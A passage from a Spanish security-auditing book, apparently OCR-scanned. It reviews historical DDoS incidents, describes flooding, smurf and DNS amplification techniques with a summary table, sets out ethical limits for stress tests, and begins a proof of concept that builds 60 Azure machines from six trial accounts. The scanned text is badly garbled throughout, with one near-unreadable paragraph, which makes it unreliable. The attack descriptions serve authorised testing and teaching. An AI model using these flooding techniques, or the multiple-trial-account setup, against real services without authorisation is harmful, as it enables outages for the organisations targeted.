sensibles.  En  el  caso  de  que  la  red  no  se  compoitase  como  hub  existiria  la  posibilidad  de  realizar  un 
ataque  M/r^V/para  conseguir  que  la  comunicacion  pasase  por  el  equipo  del  auditor. 


RTP-20121207104208886 


Fig.  3.77:  Captura  cle  audio  a  traves  de  la  red. 

Se  puede  extraer  fragmentos  de  conversaciones  de  empleados.  El  protocolo  en  esta  prueba  de 
concepto  sena  RTF,  el  cual  carece  de  cifrado  alguno.  se  tendria  que  evaluar  si  la  empresa  esta  al 
tanto  de  este  hecho,  y  en  que  caso  podria  ser  necesario  protegerlo  por  un  protocolo  mas  scuuro. 


6.D0S/DDOS 

pte  tipo  de  pruebas  son,  sin  lugar  a  la  duda,  las  mas  temidas  por  las  empresas  ya  que  buscan  evaluar 
la  fortaleza  y  recuperacion  ante  situaciones  de  estres  de  la  infraestructura  de  una  organizacion. 

Estas  pruebas  de  estres  pueden  ayudar  a  las  organizaciones  a  comprobar  el  nivcl  de  seauridad  que 
tienen  trente  a  un  ataque  de  denegacion  de  servicio  distribuido,  el  tiempo  de  recuperacion  que 
neeesitan  y  si  las  medidas  de  proteccion  son  las  adecuadas  porque  ban  respondido  comectamente 
atirante  la  ejecucion  de  la  prueba. 

Una  prueba  de  estres  se  define  con  varies  componentes  que  los  auditores  deberan  tener  en  cuenta 
os  cuales  se  .ran  estudiando  en  este  apartado.  Es  importante  entender  bien  el  entomo  que  rodea 
a  oiganizacion  para  poder  llevar  a  cabo  la  prueba  con  la  maxima  eficiencia.  Como  se  vera  mas 
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adelante  el  paradigma  cloKci  computing  y  las  botnets  aparecen  eii  muchas  ocasiones  como  vias  hacia 
la  denegacion  de  servicio. 

Las  pruebas  que  se  realicen  sobre  una  organizacion  deben  estar  siempre  bajo  el  control  del  equipo 
de  auditoria  y  sin  llegar  a  realizar  alguna  accion  no  legal.  Por  esta  razon,  como  se  vera  mas  adelante 
las  botnets  deben  ser  descartadas. 

Antes  de  comenzar  con  la  explicacion  de  pruebas  que  se  llevan  a  cabo  en  este  tipo  de  procesos  y  las 
pruebas  de  concepto  para  entender  mejor  como  llevaiio  a  cabo,  se  va  a  realizar  un  repaso  historico 
a  las  tecnicas  de  DoS  y  DDoS. 


Historia  de  las  tecnicas  DDoS 

A  lo  largo  de  los  anos  ha  habido  grandes  ataques  de  DDoS  a  empresas,  organizaciones,  gobiernos 
0  paises.  Muchos  de  estos  ataques  eran  reivindicaciones  por  acciones  de  gobiernos,  con  los  que 
los  atacantes  no  se  encontraban  de  aciierdo.  Se  puede  entender  la  DDoS  como  una  via  de  protesta 
y  ataque  contra  infraestructuras  en  busca  de  perdidas  por  parte  de  quien  lo  recibe  o  acciones  que 
reivindiquen  situaciones  enfrentadas. 

A  principios  del  ano  2014  un  grupo  en  nombre  de  Anonymous  ataco  el  sitio  web  de  la  prefectura  dt 
IVcikcivamci,  en  la  ciudad  de  Taiji.  En  esta  ciudad  hay  una  famosa  matanza,  que  sc  icaliza  desde  el 
siglo  XVll!  de  delfines.  Este  hecho  no  ha  pasado  inadvertido  por  Internet  y  por  sus  usuarios,  y  ha 
provocado  que  Anonymous  tomara  acciones  prolestantes  en  ionna  de  DDoS. 

Anonymous  dejo  el  sitio  web  de  la  prefectura  sin  sendcio  durante  varios  minutos,  y  ademas  realizaron 
un  aviso  al  gobiemo  japones  en  el  que  se  comunicaba  que  habria  mas  ataques  si  la  matanza  de 
delfines  no  llegaba  a  su  fin. 

En  Marzo  de  2013  exislio  un  conflicto  entre  Spamhaus  y  la  empresa  de  hosting  Cyberbunker,  el 
cual  desemboco  en  uno  de  los  mayores  ataques  de  DDoS  conocidos  de  la  historia  hasta  la  fecha. 
Spamhaus  es  una  organizacion  sin  fines  de  lucro  con  sede  en  Ginebra  y  Londres  y  cuyo  objetivo  es 
proporcionar  una  capa  de  filtro  anti  spam.  En  otras  palabras,  Spamhaus  proporciona  un  servicio  en 
el  que  las  empresas  pueden  comprobar  si  un  servidor  de  con*eo  pertencce  a  alguna  lista  de  spam. 
La  gente  de  Cyberhunker,  situada  en  Alemania,  se  encarga  de  hospedar  sitios  en  sus  servidores.  El 
contenido  que  alojan  puede  ser  de  cualquicr  tipo.  excepto  pomografia  infantil  o  terrorismo. 

^,Que  ocLiiTio  para  que  esto  acabe  en  uno  de  los  mayores  incidentes  de  DDoS  de  la  historia  conocida.^ 
^Quien  lanzo  la  oleada?  Lo  que  supuestamente  ocurrio  fue  que  la  gente  de  Spamhaus  califico  de 
.spam  todos  los  coireos  salientes  de  los  servidores  de  Cyberbiinker,  independientemente  de  los 
clientes  que  fueran.  En  otras  palabras,  trataron  a  todos  los  clientes  por  igual,  simplemente  por  tener 
sus  sitios  web  en  el  hosting  aleman.  Esto  provoca  muchas  cn'ticas  por  parte  de  los  clientes  de  la 
empresa  de  hosting  y  fue  la  mecha  que  encendio  lo  que  vino  despues.  A  la  segunda  pregunta  se 
puede  contestar  con  que  las  acciones  fueron  llevadas  a  cabo  por  gente  de  Cyberbunker.  A  prion 
era  algo  logico,  ya  que  ellos  se  quejaron  y  despues  el  ataque  fiie  lanzado,  pero  no  habia  pruebas 
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concluyentes.  Hiibo  cinco  organizaciones  de  seguridad  trabajando  para  entender  lo  que  pasaba  v 
quien  fue  el  oiigen  del  ataque.  Spamhaus  siempre  alego  que  el  ataque  flie  llevado  a  cabo  por  ll 
Cyberbimker  en  colaboracion  con  criminales  del  este  de  Europa  y  Rusia.  Cvberhimker  no 
contesto  a  estas  acusaciones  recibidas  por  parte  de  Spamhaus,  pero  algun  miembro  de  Cyberhunker 
fue  detenido  por  este  asunto.  ' 

i,Que  dimension  alcanzaron  los  ataques?  Parece  ser  que  se  alcanzaron  los  300  Gbit/s  Para  entenderlo 
mejor,  los  ataques  de  gran  escala  alcanzan  alrededor  de  los  50  Ghit/s,  y  en  aquellas  fechas  el  mayor 
olaque  mgislrado  fue  de  100  GbU/s.  iConsiguieron  triplicar  el  poteneial  del  ataque?  Segtrn  las  JZ 
obciales  SI.  A  gunas  empresas  importantes  ttivieron  que  ayudar  con  tecnologia  a  Spamham  por 
ejemplo  Google.  El  problema  afecto  a  otro  servicio  popular  como  Netftix,  y  si  aino  quedo  claro  es 
que  un  ataque  de  esa  magmtud  podria  tirar  practicamente  la  red  entera  de  un  pais." 

i,Como  se  llevo  a  cabo  el  ataque?  Los  culpables  del  ataque  utilizaron  una  botnet  con  mas  de  1000 
ordenadores  para  enviar  solicitudes  a  100.000  servidores  DNS  ptiblicos  usando  como  direccion  de 
oiigen  la  direccion  del  sitio  web  de  Spamhaus,  esto  es  conocido  como  IP  Spoofing.  Esto  provoco 
que  as  respiiestas  vayan  dingidas  a  la  direccion  IP  de  Spamhaus.  Simplemente  liaf  que  imamnar  el 
nivel  de  amplificacion  de  peticiones  que  consigtiio  contra  el  sitio  de  Spamhaus.  La  tecnica  conocida 
como  DNS  Amplification  pennite  realizar  una  peticion  DNS  qvxt  "pesa"  poco  y  cuya  respuesta,  ya 
iiigi  a  al  objetivo,  tiene  un  tamafio  entre  40  y  70  veces  mayor.  Esta  tecnica  es  conocida  desde  hace 
ya  bastantes  anos,  pero  no  ha  sido  hasta  estos  ultimos  aitos  que  no  ha  sido  explotada  masivamente. 

En  el  ano  200<S  se  produjo  toda  una  seciiencia  de  ataques  contra  blogs  y  que  acabo  con  la  caida 
durante  dias  del  famoso  sei-vicio  Wordpress.  Por  aquellas  fechas  Wordpress  alojaba  cerca  de  3 

millones  de  blogs  en  el  mundo,  aunqiie  hoy  en  dia  se  ha  disparado  multiplicando  entre  5  y  6  su 
niimcro  de  usuarios. 

Todo  empezo  con  la  caida  del  famoso  blog  Genbeta  debido  a  un  ataque  de  DDoS.  /Cual  fue  la 
razont  Al  parecer  Genbeta  publico  un  articulo  indicando  que  servicios  como  Blockoo.com  ofrecian 

saber  quien  te  eliminaba  del  Me.'.senger  introduciendo  tu  usuario  y  contrasena,  lo  cual  lomcamente 
era  un  traude. 

Este  articulo  lomo  gran  relevancia  en  Internet  y  se  indexo  en  los  primeros  puestos  de  Goo<^le  La 
rcaccion  de  los  delincuentes  ftie  amenazar  a  Genbeta  con  que  o  quitaban  el  articulo  o  "timrian'’ 
ahajo  el  blog.  Genbeta  estuvo  una  semana  caido  debido  al  ataque  que  fue  llevado  a  cabo  La 
coinunidad  bloguera  tomo  parte  en  el  asunto  y  volvieron  a  publicar  el  ya  famoso  articulo,  entre  los 
que  se  encontraba  Meneame.  Esto  supuso  que  Meneame  tambien  fiiera  atacada  y  Nirada"  abajo. 

Ld  historia  no  acaba  aqui,  los  chicos  de  Meneame  recibian  un  correo  electronico  donde  se  les 
a  lea  zTun  I^diendoles  dinero,  e  indicandoles  que  disponian  de  capacidad  para 

denuiS-,r  f  r  Proximos  ataques.  Logicamente  y  ante  tal  extorsion  se  decidio 

s.  a  ’  por  su  cuenta  y  descubrio  que  el  ataque 

iSin?  T  "u  ^  vulnerabilidad  explotaron  para  la  toma  de  control  de  la 

q  •  ambien  descubrio  que  los  atacantes  eran  argentinos  y  como  realizaban  el  DDoS. 
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Ricardo  Galli  consiguio  trasladar  la  investigacion  del  mundo  digital  al  mundo  fisico  en  Argentina 
y  descubrio  los  telefonos  y  direcciones  fisicas  de  los  ciberdelincuentes.  La  sitiiacion  se  ponia 
interesante  y  opto  por  llamar  a  la  madre  de  uno  de  ellos  y  comentarle,  descubrio  que  la  hermana 
de  uno  de  ellos  era  una  modelo  de  la  empresa  Playboy  y  que  habia  fotos  y  videos  de  ella  en  la  red. 

Despues  de  esto,  los  ciberdelincuentes  volvieron  a  amenazar  a  Galli,  y  tiraron  no  solo  Meneame, 
sino  tambien  el  hosting  donde  estaba  alojado,  es  decir,  Wordpress.  Este  ataque  duro  vaiios  dias, 
Galli  publico  sus  investigaciones  y  los  ciberdelincuentes  huyeron  del  pais.  El  FBI  acabo  metido  en 
el  asunto,  ya  que  Wordpress  prepare  la  denuncia. 

En  el  verano  de  20 1 3,  China  sufrio  el  mayor  ataque  de  DDoS  de  su  historia,  hasta  ese  instante.  China 
dispone  de  mas  de  560  millones  de  internautas,  lo  dial  es  un  mercado  amplio.  El  ataque  sutrido  es 
de  origen  desconocido,  y  China  no  dio  ni  dara  explieaciones,  ya  que  en  estos  ambitos  el  secretismo 
del  pals  es  total.  Es  cierto  que  el  ataque  sufrido  por  China  dejo  a  los  internautas  del  pais  sin  acceso 
a  los  dominios  ‘  xn  ”  y  deficiencias  en  el  acceso  a  Internet.  La  caida  de  servicio  no  fue  total,  ya  que 
los  proveedores  utilizaron  paginas  cacheadas  y  servicios  de  CDbl.  La  empresa  Cloiidtlare  comunico 
que  el  trafico  de  Intemet  en  China  cay6  un  32%  en  las  horas  del  ataque. 

De  todo  esto  se  puede  entender  que  China  no  esta  tan  preparada  contra  un  ataque  de  este  estilo,  y 
que  incluso  en  un  hipotetico  o  real  conflicto  de  ciberguerra  los  paises  pueden  caer  ante  un  ataque  de 
gran  escala.  La  capacidad  defensiva  de  China  quedo  en  entredicho,  y  quiza  el  ataque  tuera  llevado 
a  cabo  por  otro  pais  no  amigo. 

Todas  estas  historias  que  se  ban  ido  descubriendo  parecen  sacadas  de  una  pelicula,  pcio  son  heclios 
reales  que  suceden  en  el  mundo  digital.  Las  empresas  conocedoras  de  todo  esto,  intentan  evaluar  la 
foitaleza  de  su  infraestructura  contra  este  tipo  de  alaques.  Si  el  ataque  es  a  gran  escala,  seguramente 
casi  cLialquier  empresa  u  organizacion  caera  ante  un  DDoS,  pero  estos  datos  de  evaluacion  son 
importantes  para  que  los  directivos  puedan  tomar  decisiones  al  respecto. 

Tecnicas 

Existen  tecnicas  lanto  DoS  como  DDoS,  algunas  de  las  cuales  son  bastanle  antiguas,  pero  es 
interesante  repasarlas  e  intentar  optar  por  una  derivacion  de  la  tecnica.  En  este  apartado  se  repasan 
tecnieas  tanto  de  DoS  como  de  DDoS. 

La  primera  tecnica  que  se  presenta  es  Mail  Bombing,  la  dial  sirve  para  realizar  denegacion  de 
servicio  [DoS)  a  traves  del  envio  masivo  de  mensajes  a  una  maqtiina.  El  objetivo  es  saturar  e 
servicio  con  todos  los  coiTeos  electron  icos  recibidos. 

La  segunda  tecnica  para  DoS  es  la  denominada  "pitufo"  o  smurfing.  Esta  tecnica  se  basa  en  el 
envio  de  una  trama  ICMP,  que  corresponde  con  una  peticion  ping,  por  la  red.  La  trama  lleva  como 
direccibn  IP  de  origen  la  direccion  IP  de  la  victima,  utilizando  la  tecnica  IP  Spoofing,  y  como 
direccion  de  destino  la  direccibn  IP  de  broadcast  de  la  red  a  la  que  se  ataca.  El  objetivo  es  quejodos 
los  equipos  de  la  red  contesten  al  equipo  de  la  victima  de  modo  que  saturen  su  ancho  de  ban  a. 
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Esta  tecnica  no  tunciona  en  redes  actuales,  ya  que  se  configuran  para  que  no  se  pueda  utilizar  el 
direccionamiento  broadcast  en  IP. 

La  lereera  tecnica  son  \o<,  flood.  Existen  distintos  tipos  de  flood,  en  funcibn  de  la  capa  en  la  que 
se  encuentre  el  ataque,  por  ejempio,  SYN  flood,  D DP  flood,  HTTP  flood,  etcetera.  Con  SYN  flood 
el  atacante  utiliza  una  direccibn  IP  inexistente  y  envia  gran  cantidad  de  tramas  con  el  flag  SYN  de 
conexion  a  la  victima.  La  victima  no  puede  contestar  al  usuario  que  realiza  la  peticibn,  ya  que  la 
direccion  IP  no  existe,  por  lo  que  las  peticiones  Henan  la  cola  de  tal  manera  que  las  soliciuides  reales 
no  podrian  ser  atendidas. 

Las  tecnicas  para  DDoS  son  una  ampliacibn  de  las  tecnicas  DoS,  por  lo  que  siempre  o  casi  siempre 
se  pueden  utilizar  dichas  tecnicas  en  un  ambito  y  en  el  otro.  La  diferencia  es  que  cuando  se  habia  de 
DDoS  se  debe  visualizar  un  campo  de  batalla  mayor,  nivel  global,  un  entorno  en  el  que  maquinas 
distribuidas  geograficamente  realizan  tecnicas  basadas  en  DoS,  y  de  manera,  mas  o  menos 
sincronizada. 

En  los  ataques  de  tipo  DDoS  se  muestra  claramente  dos  veitientcs,  la  primera  es  la  denegacibn 
de  servicio,  es  decir,  conseguir  que  un  sislcma  no  pueda  llevar  a  cabo  su  funcibn,  y  la  seminda  es 
la  saiuracibn  de  la  red,  es  decir,  conseguir  que  las  redes  no  puedan  llevar  a  cabo  su  funcibn.  Es 
iinpoitante  entender  la  diferencia,  ya  que  tambien  se  podra  medir  esto  en  las  priiebas  de  DDoS. 

Las  tecnicas  de  flooding  son  muy  recurridas  en  las  pruebas  de  estres  emulando  una  situacibn  de 
DDoS.  Mas  adelante  se  detallaran  herramientas  que  pueden  permitir  este  tipo  de  piaiebas  sobre 
servidores. 

Una  de  las  tecnicas  mas  utilizadas,  y  como  se  ha  comentado  anterionnenle  en  el  caso  Spamhaus,  es 
la  de  DNS  Amplification.  Esta  tecnica  utiliza  a  los  servidores  DNS  de  Intemet  como  amplificadores 
en  el  volumen  de  bytes  que  se  respondera  a  una  victima.  En  otras  palabras.  un  atacante  realiza 
peticiones  DNS  con  una  direccibn  IP  falsa.  Cuando  el  servidor  DNS  responde  lo  hara  a  la  direccibn 
IP  que  se  ha  spoofeado,  por  lo  que  le  llegara  a  un  equipo  que  no  realizb  tal  peticibn.  La  peticibn 
DNS  ocupa  entre  40  y  70  veces  menos  que  la  respuesta,  por  lo  que  la  amplificacibn  esta  garantizada. 

Si  estas  peticiones  alcanzan  un  volumen  importante  se  puede  inundar  el  equipo  de  la  victima, 
provocando  la  denegacion  de  servicio. 

Generalmente,  se  pueden  unir  diferentes  tecnicas  con  el  objetivo  de  potenciar  el  ataque,  pero  hay 
que  tener  en  cuenta  que  tipo  de  ataques  son  "‘stimables"  y  cuales  no.  Si  el  objetivo  es  "tirar"  la 

maquina  hay  una  serie  de  ataques  •■sumables",  y  habra  otros  en  caso  de  que  el  objetivo  sea  saturar 
la  red. 


Objetivos  en  una  auditona 

Existe  una  opinibn  generalizada  en  las  organizaciones  sobre  las  pruebas  de  estres  o  pruebas  de 
enegacibn  de  servicio.  Esta  opinibn  refleja  que  estas  pruebas  son  arriesgas,  y  en  gran  parte  llevan 
asociadas  un  factor  de  riesgo,  pero  el  cual  la  organizacibn  debe  decidir  si  tomar  o  no.  Es  importante 
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elegir  a  un  equipo  adeciiado  que  lleven  a  cabo  las  pruebas  y  que  se  garanlice  en  todo  momento  que 
lo  que  se  utiliza  es  lo  que,  por  contrato,  se  ha  pactado.  Otra  de  las  circunslancias  indispensables  es 
el  conU-ol  total  sobre  la  pnieba  que  se  debe  tener. 

Como  ya  se  ha  mencionado,  es  importante  medir  la  fortaleza  de  la  infraestructura  y  los  recursos 
necesarios  para,  en  caso  de  que  la  prueba  resulte  positiva,  "twnhar’’  la  infraestructura  y  provocai 
la  denegacion  de  servicio.  Existen  sectores  donde  las  grandes  empresas  deben  estar  preparadas  para 
este  tipo  de  ataques,  por  ejemplo  empresas  del  sector  bancano  o  las  telecomumcaciones.  Pero 
tambien  deben  disponer  de  las  cifras  que  indiquen  cuanta  carga  pueden  soportar  y  cuantos  recursos 
pueden  necesitar  para  resistir  un  alaque  de  esta  Indole. 

Una  prueba  de  denegacion  de  servicio  conlleva  un  numero  de  jomadas  donde  el  equipo  debe  estudiar 
tanto  la  via  a  explotar  como  la  infraestructura  a  la  que  se  enfrentan.  Ademas,  para  garantizai  que  la 
prueba  se  realiza  en  un  entorno  no  critico,  el  horario  utilizado  para  llevar  a  cabo  la  prueba  sera  una 
ventana  de  tiempo  con  poca  actividad  en  la  empresa.  Casi  siempre  son  horarios  nocturnes,  donde 
la  actividad  de  la  empresa  disminuye.  Es  cierto  que  simular  un  ataque  real  llevana  a  los  auditores 
a  realizar  la  prueba  en  un  horario  de  maxima  productividad,  y  ademas  se  aprovecharian  de  la  carga 
que  genera  la  propia  actividad  empresarial,  pero  esto  pondria  en  riesgo  lo  mas  importante  que  tiene 
una  organ izac ion,  que  es  la  propia  actividad. 

La  prueba  de  estres  o  de  denegacion  de  sei-vicio  sc  puede  resumir  en  lo  siguiente. 

-  Estudio  de  la  infraestruclura  y  descubrimiento  de  elemenlos  y  vias  por  donde  oiientai  la 
estrategia  de  ataque. 

-  Preparacion  de  entornos  dislribuidos  para  llevar  a  cabo  la  operativa. 

-  Ejecucion  de  la  prueba  y  verificacion  de  resultados. 

En  todo  momento,  durante  la  cjecucion  de  la  prueba,  se  debe  tener  coniacto  con  el  responsable 
de  seguridad  de  la  organizacion.  El  canal  utilizado  no  puede  ser  uno  de  los  que  pueden  quedar 
denegados,  por  lo  que  se  recomienda  utilizar  el  telefono. 


El  proceso  etico 

Cuando  un  equipo  de  auditores  se  enfrenta  a  un  proceso  de  este  ambito,  uno  puede  pensar  en  que  la 
prueba  tendra  exito  utilizando  una  red  de  equipos  zombies,  es  decir,  una  botnet.  Sobre  todo  cuan  o 
uno  se  encuentra  en  este  mundo  sc  le  ocuixen  vias  para  llevar  a  cabo  esto,  pero  el  auditor  siempre 
debe  pensar  de  forma  ^ica,  por  lo  que  no  podra  utilizarse  bajo  ningiin  concepto  una  botnet.  ^Ideas. 
Como  se  vera  mas  adelantc,  se  podra  fabricar  una  gracias  al  paradigma  cloud  computing. 

La  utilizacion  de  una  botnet  no  asegura  el  control  total,  ya  que  se  estaria  contratando  uu  servicio 
ileaal  y  el  auditor  no  tendria  la  certeza  de  que  puede  parar  la  prueba  en  cualquier  mstante.  E  po 
parlir’la  prueba  por  cualquier  causa,  es  algo  que  seguramente  la  empresa  contratante  exigira  a  lo 
auditores.  Ademas,  por  ello  se  utiliza  un  canal  secundario  para  la  comunicacion  durante  el  procc 
para  asegurar  que  en  caso  de  necesidad  se  puede  dar  la  orden  de  parada. 
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La  ejecucion  de  la  prueba  se  debera  ejecutar  solamente  en  la  ventana  de  tiempo  que  la  empresa 
contratante  indique.  En  ningiin  instante,  fuera  de  esa  ventana  temporal,  se  podran  realizar  pruebas 
que  puedan  peijudicar  a  la  empresa.  Esto  es  algo  de  vital  importancia,  y  que  refleja  la  educacion  y 
etica  de  un  auditor. 

Tanto  los  resultados  como  las  pruebas  que  son  llevadas  a  cabo  son  totalmente  confidenciales.  Esto 
ocuiTC  con  todas  las  auditorias  que  se  realizan  y  que  se  expresan  en  el  presente  libro,  pero  no  esta  de 
mas  anunciarlo  siempre  que  se  liable  de  etica  profesional. 


Pruebas 

Las  pruebas  a  realizar  en  la  denegacion  de  servicio  se  basan  en  las  tecnicas  que  se  ban  ilustrado  en 
el  apartado  de  tecnicas,  explicado  anteriormente. 

A  continuacion  se  enumeran  las  pruebas: 

-  U DP  flood.  Se  realiza  la  tecnica  DNS  Amplificafiou  y  otras  basadas  cn  inundacion  de 
datagram  as  UDP. 

-  TCP  flood.  Inundacion  y  sobrecarga  de  sistemas  mediante  conexiones  TCP.  Se  uiilizan 
herramientas  que  automatizan  el  proceso,  por  ejemplo  LOIC.  Low  Orbin  Ion  Cannon. 

-  HTTP  flood.  Inundacion  de  peticiones  HTTP.  El  objetivo  es  realizar  una  gran  cantidad 
de  peticiones  a  cieitos  recursos  web  con  el  objetivo  de  alcanzar  la  saturacion  del  recurso  o 
servidor  web.  Si  se  tiene  exito  se  repoitara  mediante  una  imagen  de  una  peticion  al  recurso  y 
el  servidor  no  pudiendo  ofrecerlo. 


Resumen;  Ataques  en  general 


Ataque 

Descripcion 

Ataque  smurf 

Saturacion  JCNLP  spoofeando  la  direccion  fP  origen  para  redirigir  las 

respuestas  a  la  vi'ctima 

ICMP  echo  flood 

Envio  masivo  de  paquetes  ping 

I P  Packet  fragment 

Se  envian  paquetes  IP  que  remiten  a  otros  paquetes  que  nunca  llegaran 

al  destino,  provocando  la  .saturacion  de  la  memoria  de  la  vietima 

IGMP  flood 

Envio  masivo  de  paquetes  IGMP 

TCP  SYN flood 

Envio  masivo  de  solicitudes  de  conexion  TCP 

TCP  spoofed  SYN 

flood 

Envio  masivo  de  solicitudes  de  conexion  TCP  con  una  direccion  IP 

origen  falsa 

tcpsynack 

reflection  flood 

Envio  masivo  de  solicitudes  de  conexion  TCP  a  un  gnan  numero 

de  maquinas,  usurpando  la  direccion  de  origen  por  la  direccion  de 
la  vietima.  El  ancho  de  banda  de  la  vietima  queda  saturado  por  las 
respuestas  a  dichas  peticiones. 

JCPACK  flood 

Envio  masivo  de  acuses  de  recibo  de  segmentos  TCP 
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Ataque 

Descripcion 

TCP  fragmented 

Attack 

Envio  de  segmentos  TCP  que  remiten  voluntariamente  a  otros  que 

nunca  se  envian 

VDP  flood 

Envio  masivo  de  datagram  as  UDP 

UDP  fragment  flood 

Envio  de  datagramas  que  remiten  a  otros  datagramas  que  deben  ser 

enviados  despues,  pero  que  nunca  se  envian 

DNS  flood 

Ataque  de  un  servidor  DNS  enviando  masivamente  peticiones 

DNS  Amplification 

Envio  masivo  de  peticiones  DNS  spoofeando  la  direccion  IP  origen  y 

provocando  que  los  DNS  envien  las  respuestas  a  la  victima,  que  tendra 
direccion  IP  origen  falseada 

HTTP  flood 

Envio  masivo  de  peticiones  a  un  servidor  web 

DDoSDNS 

Ataque  de  un  seiwidor  DNS  mediante  el  envio  masivo  de  peticiones 

desde  un  gran  numero  de  maquinas  controladas  por  el  atacante 

Tabla  3.05:  Resumen  ataques  DoS/DDOS. 


PoC:  Poco  tiempo  de  actuacion  y  mucho  de  preparacion 

El  lector  ya  lia  podido  analizar  y  eiUender  que  las  pruebas  de  denegacion  de  servicio  conllevan 
bastante  preparacion  y  que  la  ventana  de  ejecucion  sera  breve,  en  tomo  a  pocas  boras. 

En  esta  prueba  de  concepto  se  propone  el  sigiiiente  escenario: 

La  empresa  contratanle  es  iina  fabrica  de  muebles,  la  ciial  dispone  de  venta  online  y  le 
preocupan  los  posibles  ataques  por  paite  de  la  competencia.  Quieren  conocei  el  estado  de  sii 
infraestructura  y  lo  que  esta  pucde  aguantar  frente  a  un  posible  ataque. 

La  ventana  de  tiempo  pactada  es  de  dos  boras,  siendo  la  bora  de  inicio  las  3.00  de  la 
madrugada  y  final izando  la  prueba  a  las  5.00  de  la  madrugada. 

-  Se  niega  el  uso  de  cualquier  red  botnet. 

-  Se  debe  disponer  de  un  control  total  sobre  la  arquitectura  que  se  utilizara  para  poder  parar 
la  prueba  en  cualquier  instante. 

El  canal  de  comunicacion  entre  la  persona  del  equipo  responsable  de  la  comunicacion  con 
el  cliente  sera  el  medio  teletonico. 

Se  aporta  un  dato  sobre  el  ancbo  de  banda  de  la  red  de  entrada  de  la  organizacion.  Este 
dato  indica  que  la  organizacion  esta  preparada  para  soportar  120  A4bit/s.  En  caso  de  que  se 
alcance  ese  maximo,  el  proveedor  le  apoita  un  ancbo  de  banda  de  300  Mbit/s  como  caso 
extraordinario  ante  un  posible  ataque. 

El  equipo  de  auditoria  estudia  el  perimetro  y  sitios  web  de  los  que  dispone  la  empresa,  requieren 
reconocer  el  terreno  contra  el  que  deben  lucbar.  Tras  entender  a  lo  que  se  entrentan,  y  sabiendo  que 
deben  utilizar  maquinas  legitimas,  oplan  por  utilizar  el  paradigma  cloud  computing  para  llevar  a 
cabo  la  prueba. 
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La  idea  es  la  siguiente: 

-  Utilizar  cuentas  de  un  proveedor  de  cloud  computing  para  lograr  disponer  de  un  numcro 
alto  de  maquinas  y  recursos. 

Por  ejemplo,  se  utilizara  el  proveedor  de  cloud  Windows  Azure. 

-  Es  importante  estudiar  cuanto  ancbo  de  banda  de  salida  se  dispone  y  si  la  distribucion 
geografica  se  puede  utilizar.  Esie  becbo  bara  que  el  equipo  disponga  de  maquinas  repaitidas 
por  el  mundo  y  monitorizadas  en  cualquier  instante. 

Tras  realizar  un  analisis  de  ancbo  de  banda,  se  obtiene  que  se  puede  tener  100  h'fbit/s  pov 
punto  de  salida  de  region.  Esto  puede  aumentar  en  funcion  de  las  necesidades  del  cliente,  es 
decir,  si  se  pagan  mas  recursos  se  dispondra  de  un  mayor  potencial. 

-  Una  vez  se  adquieren  los  recursos  en  el  cloud,  se  instalan  las  berramicntas  necesarias  para 
llevar  a  cabo  las  pruebas. 

-  En  un  caso  real,  se  puede  utilizar  las  cuentas  que  proveedores  como  Azure  o  Amazon 
ofertan,  y  con  varias  cuentas  disponer  de  un  niimero  de  equipos  y  recursos  potentes,  los 
cuales  pueden  servir  para  llevar  a  cabo  con  exito  esle  tipo  de  pruebas. 

Si  se  quiere  aumentar  las  posibilidades  de  exito,  se  debera  inveitir  mas  dinero  en  oblener  mas 
recursos  y  mas  potencia  en  el  cloud.  En  esta  prueba  de  concepto  sc  adquieren  seis  cuentas  de 
prueba  de  Windows  Azure,  para  lo  que  se  necesita  seis  tarjetas  diferenles.  Aunque  no  se  bagan 
pagos,  se  necesitan  dates  de  facturacion  por  si  mas  adelante  el  cliente  adquiere  un  servicio 
de  pago. 


Por  cada  cuenta  el  equipo  de  auditores  prepara  diez  maquinas.  por  lo  que  al  final  se  lienen  60 
maquinas  Windows  disiribuidas  geograficamente  \:iOx  Azure. 


El  arsenal  de  ataque  esta  casi  preparado. 


Fig.  3.78:  Crcacion  de  maqiiina  on  Windows  Azure. 


La  creacion  de  maquinas  es  seiicilla  en  Azure  y  bastante  rapida.  Se  deben  configurar  los  dislintos 
parametros,  como  es  el  sistema  operative  que  se  quiere  utilizar  en  la  maquina.  Ademas  se  debe 
indicar  el  usuario  y  contrasena  con  la  que  se  accedera  a  la  maquina  en  el  cloud. 
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Configuracion  de  la  maquina  virtual 


FECHA  Dc  LA^JZAMIE^4T0  DE  LA  '/ERSION 


jj2/l  1/2013 


FiONIBRE  DE  LA  MAQUINA  VIPJUAL 


TEST 

TAMANO 


I  Pfiquena  (1  nucleo  1.75  GB  de  memoria) 


NUEVO  NOMBRE  OE  USUARIO 


I  userOI 

NUEVA  CONTRASENA 


Windows  Sealer  201 2 
R2  Datacenter 

At  the  heart  of  the  Microsoft  Cloud  OS 
vision.  V/indovvs  Server  20' 2  R2  brings 
Microsoft's  e>:perience  delivering 
global-scale  cloud  services  into  your 
infrastructure,  it  offers  enterprise-class 
performance,  flexibiirty  for  your 
applications  and  excellent  economics  for 
your  datacenter  and  hybrid  cloud 
environment.. 

FAMIUA  DEL 
SISTEMA 
OPERATIVO 
',Vindov/5 

PUBLICADOR 

Microsoft  VVindcv.E  Server  Group 
UBICACiONES 

East  A7ia;Sout’ne3st  Asie;Mcrth 

Fnrrrc'laran 

INFORf.lAC10N  SOBRE  PRECIOS 

Los  precios  varan  en  funcion  de  Is  suEcripdon 

que  sclcccione  para  aprovicondi  la  nvaquine 

virtual. 


Fig.  3.79:  Usuario  y  conirasena 
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Los  metodos  con  los  que  el  auditor  podra  acceder  a  la  maquina  virtual  que  esta  utilizando  seran  a 
traves  de  los  servidos  de  escritorio  remoto  o  mediante  el  uso  de  comandos  de  Powershell.  En  el 
eqiiipo  remoto  se  podria  automatizar  con  scripting  la  ejecucion  de  todas  las  pniebas  que  se  quieran 
realizan  pero  teniendo  una  sola  oportunidad  en  una  ventana  de  tiempo,  la  posibilidad  de  realizar 
se2;uimiento,  o  incltiso  la  ejecucion  manual  de  las  pniebas,  es  algo  interesante  a  valorar,  por  lo  que 
en  muchas  ocasiones  es  mas  comodo  realizar  la  conexion  a  traves  de  una  conexion  de  escritorio 
remoto  que  de  acceso  a  todas  las  heiTamientas  de  monitorizacion  y  soporte  de  la  maquina. 

Una  de  las  acciones  impoitantes  en  el  guiado  de  Microsoft  Azure  para  la  creacion  de  nuevas  maquinas 
alojadas  en  sus  servicios  de  Cloud  es  la  seleccion  de  distintas  regiones  geograficas  en  las  que  se 
pucden  ubicar.  Se  puede  comprobar  despues  de  que  estas  scan  creadas,  que  las  maquinas  salen 
por  distintos  sitios  a  Internet  haciendo  uso  de  una  simple  conexion  a  un  servicio  de  verificacion  de 
